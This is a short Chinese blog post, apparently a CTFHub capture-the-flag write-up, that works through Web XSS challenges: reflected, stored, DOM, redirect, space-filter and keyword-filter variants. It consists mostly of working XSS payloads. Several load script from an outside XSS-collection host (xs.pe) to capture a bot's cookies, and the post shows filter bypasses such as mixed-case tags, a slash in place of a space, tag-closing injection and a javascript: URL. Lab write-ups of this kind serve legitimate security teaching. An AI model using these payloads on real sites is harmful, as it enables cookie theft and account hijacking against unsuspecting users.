CTFHub Web XSS

CTFHub Web XSS

Posted by Kyon-H on July 2, 2025

1. XSS

1.1. 反射型

image

1
<script>alert(123)</script> #成功

注册 XSS 平台,填入 <sCRiPt sRC=//xs.pe/s2x></sCrIpT> 复制地址栏地址 sendURLtoBot

查看访问记录的 cookie

image

1.2. 存储型

1
2
<script>alert(123)</script> #成功
<sCRiPt sRC=//xs.pe/s2x></sCrIpT>

image

1.3. DOM 反射

1
<script>alert(123)</script> #失败,发现是与原始script闭合导致

imageimage

1
2
3
#补全,成功
</script><script>alert(123)</script>
</script><sCRiPt sRC=//xs.pe/s2x></sCrIpT>

image

1.4. DOM 跳转

查看页面代码,可知需要构造 ?jumpto=xxx

image

http://challenge-e727a1e5d8b21242.sandbox.ctfhub.com:10800/?jumpto=javascript:alert(123)

成功

1.5. 过滤空格

1
<sCRiPt sRC=//xs.pe/s2x></sCrIpT>

image

1
<sCRiPt/SrC=//xs.pe/s2x> #成功

image

1.6. 过滤关键词

测试过滤 scriptimgonerror

image

大写绕过

1
<sCRiPt sRC=//xs.pe/s2x></sCrIpT>

image